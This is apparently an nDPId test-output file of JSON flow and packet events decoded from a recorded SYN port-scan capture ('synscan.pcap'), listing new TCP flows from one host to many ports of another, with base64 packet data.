+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAshEYAADgGjCysEAAIQA2GNIzSHvHdUoMYAAAAAGACBAAVngAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAspVMAADMGcB+sEAAIQA2GNIzSF+DdUoMYAAAAAGACEAAQrwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAskd4AACkGjZSsEAAIQA2GNIzSxHzdUoMYAAAAAGACCABsEgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+wAAC4G4oasEAAIQA2GNIzSGAzdUoMYAAAAAGACDAAUgwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ2YAADQG7QysEAAIQA2GNIzSNdfdUoMYAAAAAGACBAD+twAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAs1wMAADAGQW+sEAAIQA2GNIzSH0fdUoMYAAAAAGACBAAVSAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsnrUAADMGdr2sEAAIQA2GNIzSgAXdUoMYAAAAAGACEACoiQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsmXkAADsGc\/msEAAIQA2GNIzSBFHdUoMYAAAAAGACEAAkPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsX+sAAC8GuYesEAAIQA2GNIzSE7rdUoMYAAAAAGACEAAU1QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsrscAADQGZausEAAIQA2GNIzSBJfdUoMYAAAAAGACBAAv+AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAspigAADAGckqsEAAIQA2GNIzSDLzdUoMYAAAAAGACBAAn0wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsFq0AADAGAcasEAAIQA2GNIzSIyndUoMYAAAAAGACBAARZgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsr38AACUGc\/OsEAAIQA2GNIzSOpvdUoMYAAAAAGACCAD18wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAs1pwAADMGPtasEAAIQA2GNIzSAEbdUoMYAAAAAGACEAAoSQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsCvQAAC8GDn+sEAAIQA2GNIzSB9PdUoMYAAAAAGACEAAgvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhYAADIGBF2sEAAIQA2GNIzSBAbdUoMYAAAAAGACDAAoiQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsysMAADYGR6+sEAAIQA2GNIzSAh\/dUoMYAAAAAGACDAAqcAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAshYsAADUGjeesEAAIQA2GNIzSBGzdUoMYAAAAAGACCAAsIwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsx5MAACYGWt+sEAAIQA2GNIzS\/G\/dUoMYAAAAAGACDAAwHwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAAC8GofGsEAAIQA2GNIzSF3fdUoMYAAAAAGACEAARGAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8MAADAGwK+sEAAIQA2GNIzSDOTdUoMYAAAAAGACBAAnqwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsDVUAACcGFB6sEAAIQA2GNIzSAN7dUoMYAAAAAGACEAAnsQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsTlwAADEGyRasEAAIQA2GNIzSIALdUoMYAAAAAGACCAAQjQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmwAACoG9AasEAAIQA2GNIzSKYTdUoMYAAAAAGACDAADCwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 